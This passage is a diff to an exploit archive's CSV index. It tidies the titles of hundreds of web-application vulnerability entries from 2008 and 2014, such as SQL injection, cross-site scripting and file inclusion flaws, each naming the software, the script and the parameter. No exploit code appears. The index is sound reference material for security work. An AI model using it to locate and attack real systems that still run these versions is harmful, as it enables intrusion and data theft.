Injection",2014-02-18,killall-9,php,webapps,80 +31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection",2014-02-18,killall-9,php,webapps,80 31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - (owa_email_address Parameter) SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0 -31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injection",2008-05-05,ZoRLu,php,webapps,0 +31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injections",2008-05-05,ZoRLu,php,webapps,0 31740,platforms/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 31741,platforms/php/webapps/31741.txt,"Maian Uploader 4.0 - 'keywords' Parameter Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 31742,platforms/php/webapps/31742.txt,"Maian Uploader 4.0 - 'index.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 @@ -32405,7 +32416,7 @@ id,file,description,date,author,platform,type,port 31745,platforms/php/webapps/31745.txt,"BatmanPorTaL - uyeadmin.asp id Parameter SQL Injection",2008-05-05,U238,php,webapps,0 31746,platforms/php/webapps/31746.txt,"BatmanPorTaL - profil.asp id Parameter SQL Injection",2008-05-05,U238,php,webapps,0 31747,platforms/php/webapps/31747.pl,"iGaming CMS 1.5 - 'poll_vote.php' SQL Injection",2008-05-05,Cod3rZ,php,webapps,0 -31749,platforms/php/webapps/31749.py,"RunCMS 1.6.1 - 'pm.class.php' Multiple SQL Injection",2008-05-06,The:Paradox,php,webapps,0 +31749,platforms/php/webapps/31749.py,"RunCMS 1.6.1 - 'pm.class.php' Multiple SQL Injections",2008-05-06,The:Paradox,php,webapps,0 31750,platforms/php/webapps/31750.txt,"QTO File Manager 1.0 - 'qtofm.php' Arbitrary File Upload",2008-05-06,"CrAzY CrAcKeR",php,webapps,0 31751,platforms/php/webapps/31751.txt,"Sphider 1.3.4 - 'query' Parameter Cross-Site Scripting",2008-05-06,"Christian Holler",php,webapps,0 31752,platforms/php/webapps/31752.txt,"Forum Rank System 6 - 'settings['locale']' Parameter Multiple Local File Inclusion",2008-05-07,Matrix86,php,webapps,0 @@ -32426,7 +32437,7 @@ id,file,description,date,author,platform,type,port 31778,platforms/php/webapps/31778.txt,"PHPInstantGallery 2.0 - 'index.php' Gallery Parameter Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 31779,platforms/php/webapps/31779.txt,"PHPInstantGallery 2.0 - image.php Multiple Parameter Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 31780,platforms/php/webapps/31780.txt,"CyrixMED 1.4 - 'index.php' Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 -31781,platforms/php/webapps/31781.txt,"IBD Micro CMS 3.5 - 'microcms-admin-login.php' Multiple SQL Injection",2008-05-12,SkyOut,php,webapps,0 +31781,platforms/php/webapps/31781.txt,"IBD Micro CMS 3.5 - 'microcms-admin-login.php' Multiple SQL Injections",2008-05-12,SkyOut,php,webapps,0 31782,platforms/php/webapps/31782.txt,"Claroline 1.7.5 - Multiple Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 31783,platforms/php/webapps/31783.txt,"Fusebox 5.5.1 - 'fusebox5.php' Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 31784,platforms/php/webapps/31784.txt,"phpMyAgenda 2.1 - 'infoevent.php3' Remote File Inclusion",2008-05-12,MajnOoNxHaCkEr,php,webapps,0 @@ -32465,7 +32476,7 @@ id,file,description,date,author,platform,type,port 31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 - search_results.php keyword Parameter Cross-Site Scripting",2008-05-22,"Ali Jasbi",php,webapps,0 32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0 31833,platforms/php/webapps/31833.txt,"ILIAS 4.4.1 - Multiple Vulnerabilities",2014-02-22,HauntIT,php,webapps,80 -31834,platforms/php/webapps/31834.txt,"WordPress Plugin AdRotate 3.9.4 - 'clicktracker.php track Parameter' SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 +31834,platforms/php/webapps/31834.txt,"WordPress Plugin AdRotate 3.9.4 - 'clicktracker.php' 'track' Parameter SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 31835,platforms/php/webapps/31835.txt,"Apple Safari Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",php,webapps,0 31836,platforms/php/webapps/31836.txt,"WordPress Plugin Upload File - 'wp-uploadfile.php' SQL Injection",2008-05-24,eserg.ru,php,webapps,0 31837,platforms/php/webapps/31837.txt,"DZOIC Handshakes 3.5 - 'fname' Parameter SQL Injection",2008-05-24,"Ali Jasbi",php,webapps,0 @@ -32488,16 +32499,16 @@ id,file,description,date,author,platform,type,port 31855,platforms/php/webapps/31855.txt,"Tr Script News 2.1 - 'news.php' Cross-Site Scripting",2008-05-27,ZoRLu,php,webapps,0 31857,platforms/php/webapps/31857.txt,"Joomla! / Mambo Component Artists - 'idgalery' Parameter SQL Injection",2008-05-28,Cr@zy_King,php,webapps,0 31858,platforms/php/webapps/31858.txt,"Calcium 3.10/4.0.4 - 'Calcium40.pl' Cross-Site Scripting",2008-05-28,"Marvin Simkin",php,webapps,0 -31859,platforms/asp/webapps/31859.txt,"JustPORTAL 1.0 - 'site' Parameter Multiple SQL Injection",2008-05-29,"Ugurcan Engin",asp,webapps,0 -31860,platforms/asp/webapps/31860.txt,"Proje ASP Portal 2.0 - 'id' Parameter Multiple SQL Injection",2008-05-29,"Ugurcan Engin",asp,webapps,0 -31861,platforms/asp/webapps/31861.txt,"dvbbs 8.2 - 'login.asp' Multiple SQL Injection",2008-05-29,hackerbinhphuoc,asp,webapps,0 +31859,platforms/asp/webapps/31859.txt,"JustPORTAL 1.0 - 'site' Parameter Multiple SQL Injections",2008-05-29,"Ugurcan Engin",asp,webapps,0 +31860,platforms/asp/webapps/31860.txt,"Proje ASP Portal 2.0 - 'id' Parameter Multiple SQL Injections",2008-05-29,"Ugurcan Engin",asp,webapps,0 +31861,platforms/asp/webapps/31861.txt,"dvbbs 8.2 - 'login.asp' Multiple SQL Injections",2008-05-29,hackerbinhphuoc,asp,webapps,0 31865,platforms/asp/webapps/31865.txt,"DotNetNuke 4.8.3 - 'Default.aspx' Cross-Site Scripting",2008-05-30,"AmnPardaz Security Research Team",asp,webapps,0 31866,platforms/php/webapps/31866.txt,"TorrentTrader Classic 1.x - 'scrape.php' SQL Injection",2008-05-31,"Charles Vaughn",php,webapps,0 31867,platforms/php/webapps/31867.php,"CMS Easyway - 'mid' Parameter SQL Injection",2008-05-30,Lidloses_Auge,php,webapps,0 31868,platforms/php/webapps/31868.txt,"OtomiGenX 2.2 - 'userAccount' Parameter SQL Injection",2008-06-02,hadihadi,php,webapps,0 31869,platforms/asp/webapps/31869.txt,"i-pos StoreFront 1.3 - 'index.asp' SQL Injection",2008-06-02,KnocKout,asp,webapps,0 31870,platforms/php/webapps/31870.pl,"Joomla! / Mambo Component Joo!BB 0.5.9 - 'forum' Parameter SQL Injection",2008-06-02,His0k4,php,webapps,0 -31871,platforms/asp/webapps/31871.txt,"Te Ecard - 'id' Parameter Multiple SQL Injection",2008-06-02,"Ugurcan Engyn",asp,webapps,0 +31871,platforms/asp/webapps/31871.txt,"Te Ecard - 'id' Parameter Multiple SQL Injections",2008-06-02,"Ugurcan Engyn",asp,webapps,0 31874,platforms/jsp/webapps/31874.py,"Ganib Project Management 2.3 - SQL Injection",2014-02-24,drone,jsp,webapps,80 31880,platforms/php/webapps/31880.txt,"WyMIEN PHP 1.0 - 'index.php' Cross-Site Scripting",2008-06-04,ZoRLu,php,webapps,0 31881,platforms/php/webapps/31881.txt,"PHP Address Book 3.1.5 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 @@ -32535,9 +32546,9 @@ id,file,description,date,author,platform,type,port 31951,platforms/php/webapps/31951.txt,"Chipmunk Blog - 'photos.php' Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps,0 31952,platforms/php/webapps/31952.txt,"Chipmunk Blog - 'archive.php' Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps,0 31953,platforms/php/webapps/31953.txt,"Chipmunk Blog - 'cat.php' Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps,0 -31954,platforms/php/webapps/31954.txt,"Benja CMS 0.1 - /admin/admin_edit_submenu.php URL Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps,0 +31954,platforms/php/webapps/31954.txt,"Benja CMS 0.1 - '/admin/admin_edit_submenu.php' URL Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps,0 31955,platforms/php/webapps/31955.txt,"Benja CMS 0.1 - '/admin/admin_new_submenu.php' URL Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps,0 -31956,platforms/php/webapps/31956.txt,"Benja CMS 0.1 - /admin/admin_edit_topmenu.php URL Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps,0 +31956,platforms/php/webapps/31956.txt,"Benja CMS 0.1 - '/admin/admin_edit_topmenu.php' URL Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps,0 31960,platforms/php/webapps/31960.txt,"A+ PHP Scripts News Management System 0.3 - Multiple Input Validation Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 31961,platforms/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,php,webapps,80 31962,platforms/ios/webapps/31962.txt,"Bluetooth Photo Share Pro 2.0 iOS - Multiple Vulnerabilities",2014-02-27,Vulnerability-Lab,ios,webapps,8080 @@ -32546,7 +32557,7 @@ id,file,description,date,author,platform,type,port 32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - 'debug.jsp' HTML Injection / Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 32047,platforms/php/webapps/32047.txt,"Hudson 1.223 - 'q' Parameter Cross-Site Scripting",2008-07-11,syniack,php,webapps,0 31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80 -31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 - 'get_all_created_by_user.php id Parameter' SQL Injection",2014-02-28,HauntIT,php,webapps,80 +31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 - 'get_all_created_by_user.php' 'id' Parameter SQL Injection",2014-02-28,HauntIT,php,webapps,80 32094,platforms/cgi/webapps/32094.pl,"HiFriend - 'cgi-bin/hifriend.pl' Open Email Relay",2008-07-21,Perforin,cgi,webapps,0 31975,platforms/php/webapps/31975.txt,"The Rat CMS - viewarticle.php Multiple Parameter Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps,0 31976,platforms/php/webapps/31976.txt,"The Rat CMS - viewarticle2.php id Parameter Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps,0 @@ -32556,7 +32567,7 @@ id,file,description,date,author,platform,type,port 32134,platforms/php/webapps/32134.txt,"H0tturk Panel - 'gizli.php' Remote File Inclusion",2008-07-31,U238,php,webapps,0 31983,platforms/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400 31986,platforms/php/webapps/31986.txt,"WordPress Plugin VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 -31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 - 'SalesInquiry.php SortBy Parameter' SQL Injection",2014-02-28,HauntIT,php,webapps,80 +31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 - 'SalesInquiry.php' 'SortBy' Parameter SQL Injection",2014-02-28,HauntIT,php,webapps,80 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",multiple,webapps,0 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0 31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection",2014-03-01,Portcullis,windows,webapps,8080 @@ -32592,7 +32603,7 @@ id,file,description,date,author,platform,type,port 32034,platforms/php/webapps/32034.txt,"V-Webmail 1.6.4 - includes/cachedConfig.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 32035,platforms/php/webapps/32035.txt,"V-Webmail 1.6.4 - includes/prepend.php CONFIG[includes] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 32036,platforms/php/webapps/32036.txt,"V-Webmail 1.6.4 - includes/email.list.search.php CONFIG[includes] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 -32037,platforms/php/webapps/32037.txt,"couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injection",2014-03-03,LiquidWorm,php,webapps,0 +32037,platforms/php/webapps/32037.txt,"couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injections",2014-03-03,LiquidWorm,php,webapps,0 32038,platforms/php/webapps/32038.txt,"SpagoBI 4.0 - Persistent Cross-Site Scripting",2014-03-03,"Christian Catalano",php,webapps,0 32039,platforms/php/webapps/32039.txt,"SpagoBI 4.0 - Persistent HTML Script Insertion",2014-03-03,"Christian Catalano",php,webapps,0 32040,platforms/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary Cross-Site Scripting / Arbitrary File Upload",2014-03-03,"Christian Catalano",php,webapps,0 @@ -32614,7 +32625,7 @@ id,file,description,date,author,platform,type,port 32068,platforms/php/webapps/32068.txt,"Claroline 1.8.9 - phpBB/viewtopic.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32069,platforms/php/webapps/32069.txt,"Claroline 1.8.9 - wiki/wiki.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32070,platforms/php/webapps/32070.txt,"Claroline 1.8.9 - work/work.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 - claroline/redirector.php url Variable Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0 +32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 - 'claroline/redirector.php' 'url' Parameter Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0 32075,platforms/php/webapps/32075.txt,"OpenDocMan 1.2.7 - Multiple Vulnerabilities",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32076,platforms/php/webapps/32076.txt,"Ilch CMS 2.0 - Persistent Cross-Site Scripting",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32077,platforms/php/webapps/32077.txt,"IBS 0.15 - 'Username' Parameter Cross-Site Scripting",2008-07-17,Cyb3r-1sT,php,webapps,0 @@ -32627,7 +32638,7 @@ id,file,description,date,author,platform,type,port 32085,platforms/php/webapps/32085.txt,"PHPFreeChat 1.1 - 'demo21_with_hardocded_urls.php' Cross-Site Scripting",2008-07-18,ahmadbady,php,webapps,0 32087,platforms/php/webapps/32087.txt,"EasyBookMarker 4.0 - 'ajaxp_backend.php' Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 32088,platforms/php/webapps/32088.pl,"EasyDynamicPages 3.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 -32089,platforms/php/webapps/32089.pl,"EasyPublish 3.0 - 'read' Parameter Multiple SQL Injection / Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 +32089,platforms/php/webapps/32089.pl,"EasyPublish 3.0 - 'read' Parameter Multiple SQL Injections / Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 32090,platforms/php/webapps/32090.txt,"Maran PHP Blog - 'comments.php' Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 32091,platforms/php/webapps/32091.txt,"MyBlog 0.9.8 - Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",php,webapps,0 32092,platforms/php/webapps/32092.txt,"Flip 3.0 - 'config.php' Remote File Inclusion",2008-07-21,Cru3l.b0y,php,webapps,0 @@ -32673,7 +32684,7 @@ id,file,description,date,author,platform,type,port 32151,platforms/asp/webapps/32151.pl,"Pcshey Portal - 'kategori.asp' SQL Injection",2008-08-04,U238,asp,webapps,0 32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80 32161,platforms/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",hardware,webapps,80 -32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php Filename Parameter' Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 +32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php' 'Filename' Parameter Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 32168,platforms/php/webapps/32168.txt,"Pluck CMS 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",php,webapps,0 32169,platforms/php/webapps/32169.txt,"Crafty Syntax Live Help 2.14.6 - 'livehelp_js.php' Cross-Site Scripting",2008-08-05,CoRSaNTuRK,php,webapps,0 32170,platforms/php/webapps/32170.txt,"Softbiz Image Gallery - 'index.php' Multiple Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 @@ -32687,7 +32698,7 @@ id,file,description,date,author,platform,type,port 32178,platforms/php/webapps/32178.txt,"Softbiz Image Gallery - browsecats.php msg Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 32179,platforms/php/webapps/32179.txt,"POWERGAP ShopSystem - 's03.php' SQL Injection",2008-08-05,"Rohit Bansal",php,webapps,0 32180,platforms/php/webapps/32180.txt,"Chupix CMS Contact Module 0.1 - 'index.php' Multiple Local File Inclusion",2008-08-06,casper41,php,webapps,0 -32181,platforms/php/webapps/32181.txt,"Battle.net Clan Script 1.5.x - 'index.php' Multiple SQL Injection",2008-08-06,"Khashayar Fereidani",php,webapps,0 +32181,platforms/php/webapps/32181.txt,"Battle.net Clan Script 1.5.x - 'index.php' Multiple SQL Injections",2008-08-06,"Khashayar Fereidani",php,webapps,0 32182,platforms/php/webapps/32182.txt,"PHPKF-Portal 1.10 - baslik.php tema_dizin Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0 32183,platforms/php/webapps/32183.txt,"PHPKF-Portal 1.10 - anket_yonetim.php portal_ayarlarportal_dili Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0 32184,platforms/asp/webapps/32184.txt,"KAPhotoservice - order.asp page Parameter Cross-Site Scripting",2008-08-06,by_casper41,asp,webapps,0 @@ -32704,7 +32715,7 @@ id,file,description,date,author,platform,type,port 32201,platforms/php/webapps/32201.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - scrapbook.php uid Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 32202,platforms/php/webapps/32202.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'index.php' uid Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 32203,platforms/php/webapps/32203.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - tribes.php uid Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 -32204,platforms/hardware/webapps/32204.txt,"ZYXEL Router P-660HN-T1A - Login Bypass",2014-03-12,"Michael Grifalconi",hardware,webapps,0 +32204,platforms/hardware/webapps/32204.txt,"ZYXEL P-660HN-T1A Router - Login Bypass",2014-03-12,"Michael Grifalconi",hardware,webapps,0 32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0 32207,platforms/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",php,webapps,80 32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - Cross-Site Request Forgery / Blind SQL Injection",2014-03-12,"TUNISIAN CYBER",php,webapps,80 @@ -32734,7 +32745,7 @@ id,file,description,date,author,platform,type,port 32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - 'mambots/editors/mostlyce/' PHP/connector.php Query String Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0 32254,platforms/php/webapps/32254.txt,"FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting",2008-08-15,Dr.Crash,php,webapps,0 32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0 -32257,platforms/php/webapps/32257.txt,"PromoProducts - 'view_product.php' Multiple SQL Injection",2008-08-15,baltazar,php,webapps,0 +32257,platforms/php/webapps/32257.txt,"PromoProducts - 'view_product.php' Multiple SQL Injections",2008-08-15,baltazar,php,webapps,0 32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 - 'AWStats.pl' Cross-Site Scripting",2008-08-18,"Morgan Todd",cgi,webapps,0 32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 - english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 33409,platforms/php/webapps/33409.txt,"Article Directory - 'login.php' SQL Injection",2009-12-16,"R3d D3v!L",php,webapps,0 @@ -32812,7 +32823,7 @@ id,file,description,date,author,platform,type,port 32375,platforms/php/webapps/32375.txt,"OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities",2014-03-20,//sToRm,php,webapps,0 32383,platforms/php/webapps/32383.txt,"phpMyAdmin 3.2 - 'server_databases.php' Remote Command Execution",2008-09-15,"Norman Hippert",php,webapps,0 32385,platforms/hardware/webapps/32385.txt,"D-Link DIR-600L Hardware Version AX Firmware 1.00 - Cross-Site Request Forgery",2014-03-20,"Dhruv Shah",hardware,webapps,0 -32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injection",2008-09-25,"David Sopas",php,webapps,0 +32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injections",2008-09-25,"David Sopas",php,webapps,0 32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Inclusion",2008-09-25,Pepelux,php,webapps,0 32421,platforms/php/webapps/32421.html,"Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0 32422,platforms/php/webapps/32422.txt,"Vikingboard 0.2 Beta - 'register.php' SQL Column Truncation Unauthorized Access",2008-09-25,StAkeR,php,webapps,0 @@ -32845,7 +32856,7 @@ id,file,description,date,author,platform,type,port 32473,platforms/php/webapps/32473.txt,"Joomla! Component com_jeux - 'id' Parameter SQL Injection",2008-10-11,H!tm@N,php,webapps,0 32474,platforms/php/webapps/32474.txt,"EEB-CMS 0.95 - 'index.php' Cross-Site Scripting",2008-10-11,d3v1l,php,webapps,0 32479,platforms/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary File Upload",2014-03-24,"felipe andrian",php,webapps,0 -32520,platforms/php/webapps/32520.txt,"OpenCart 1.5.6.1 - 'openbay' Multiple SQL Injection",2014-03-26,"Saadi Siddiqui",php,webapps,0 +32520,platforms/php/webapps/32520.txt,"OpenCart 1.5.6.1 - 'openbay' Multiple SQL Injections",2014-03-26,"Saadi Siddiqui",php,webapps,0 32563,platforms/php/webapps/32563.txt,"YourFreeWorld Downline Builder Pro - 'tr.php' SQL Injection",2008-11-02,"Hussin X",php,webapps,0 32485,platforms/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi - 'xurunler.asp' SQL Injection",2008-10-13,tRoot,asp,webapps,0 32486,platforms/php/webapps/32486.txt,"Webscene eCommerce - 'productlist.php' SQL Injection",2008-10-14,"Angela Chang",php,webapps,0 @@ -32870,7 +32881,7 @@ id,file,description,date,author,platform,type,port 32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 - Database Backup Disclosure",2014-03-25,LiquidWorm,php,webapps,0 32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 - (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80 -32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - 'xhr.php i Parameter' SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 +32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - 'xhr.php' 'i' Parameter SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 - 'ListRecords.php' Multiple Remote File Inclusion",2008-10-23,BoZKuRTSeRDaR,php,webapps,0 32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 - 'api.php' URI redirection",2008-10-23,xuanmumu,php,webapps,0 32524,platforms/php/webapps/32524.txt,"UC Gateway Investment SiteEngine 5.0 - 'announcements.php' SQL Injection",2008-10-23,xuanmumu,php,webapps,0 @@ -32880,7 +32891,7 @@ id,file,description,date,author,platform,type,port 32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 - 'pg' Parameter Cross-Site Scripting",2008-10-24,"Ghost Hacker",php,webapps,0 32531,platforms/php/webapps/32531.txt,"phpMyAdmin 3.0.1 - 'pmd_pdf.php' Cross-Site Scripting",2008-10-27,"Hadi Kiamarsi",php,webapps,0 32532,platforms/php/webapps/32532.txt,"bcoos 1.0.13 - 'common.php' Remote File Inclusion",2008-10-27,Cru3l.b0y,php,webapps,0 -32533,platforms/php/webapps/32533.txt,"Tandis CMS 2.5 - 'index.php' Multiple SQL Injection",2008-10-27,G4N0K,php,webapps,0 +32533,platforms/php/webapps/32533.txt,"Tandis CMS 2.5 - 'index.php' Multiple SQL Injections",2008-10-27,G4N0K,php,webapps,0 32535,platforms/php/webapps/32535.txt,"MyBB 1.4.2 - 'moderation.php' Cross-Site Scripting",2008-10-27,Kellanved,php,webapps,0 32536,platforms/php/webapps/32536.txt,"bcoos 1.0.13 - 'click.php' SQL Injection",2008-10-27,DeltahackingTEAM,php,webapps,0 32537,platforms/php/webapps/32537.txt,"All In One 1.4 Control Panel - 'cp_polls_results.php' SQL Injection",2008-10-27,ExSploiters,php,webapps,0 @@ -32965,8 +32976,8 @@ id,file,description,date,author,platform,type,port 32641,platforms/php/webapps/32641.txt,"RevSense 1.0 - SQL Injection / Cross-Site Scripting",2008-12-04,Pouya_Server,php,webapps,0 32642,platforms/php/webapps/32642.txt,"PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection",2008-12-04,"CWH Underground",php,webapps,0 32644,platforms/php/webapps/32644.txt,"Alienvault 4.5.0 - Authenticated SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",php,webapps,443 -32645,platforms/php/webapps/32645.txt,"TWiki 4.x - SEARCH Variable Remote Command Execution",2008-12-06,"Troy Bollinge",php,webapps,0 -32646,platforms/php/webapps/32646.txt,"TWiki 4.x - URLPARAM Variable Cross-Site Scripting",2008-12-06,"Marc Schoenefeld",php,webapps,0 +32645,platforms/php/webapps/32645.txt,"TWiki 4.x - 'SEARCH' Parameter Remote Command Execution",2008-12-06,"Troy Bollinge",php,webapps,0 +32646,platforms/php/webapps/32646.txt,"TWiki 4.x - 'URLPARAM' Parameter Cross-Site Scripting",2008-12-06,"Marc Schoenefeld",php,webapps,0 32647,platforms/php/webapps/32647.txt,"PrestaShop 1.1 - admin/login.php PATH_INFO Parameter Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32648,platforms/php/webapps/32648.txt,"PrestaShop 1.1 - order.php PATH_INFO Parameter Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32649,platforms/php/webapps/32649.txt,"PHPepperShop 1.4 - 'index.php' URL Cross-Site Scripting",2008-12-08,th3.r00k.ieatpork,php,webapps,0 @@ -32987,7 +32998,7 @@ id,file,description,date,author,platform,type,port 32668,platforms/php/webapps/32668.txt,"CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities",2014-04-03,"Blessen Thomas",php,webapps,0 32669,platforms/php/webapps/32669.txt,"PHPcksec 0.2 - 'PHPcksec.php' Cross-Site Scripting",2008-12-17,ahmadbady,php,webapps,0 32670,platforms/php/webapps/32670.txt,"Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0) - Unvalidated Redirects",2014-04-03,"Giuseppe D'Amore",php,webapps,0 -32671,platforms/php/webapps/32671.txt,"DO-CMS 3.0 - 'p' Parameter Multiple SQL Injection",2008-12-18,"crash over",php,webapps,0 +32671,platforms/php/webapps/32671.txt,"DO-CMS 3.0 - 'p' Parameter Multiple SQL Injections",2008-12-18,"crash over",php,webapps,0 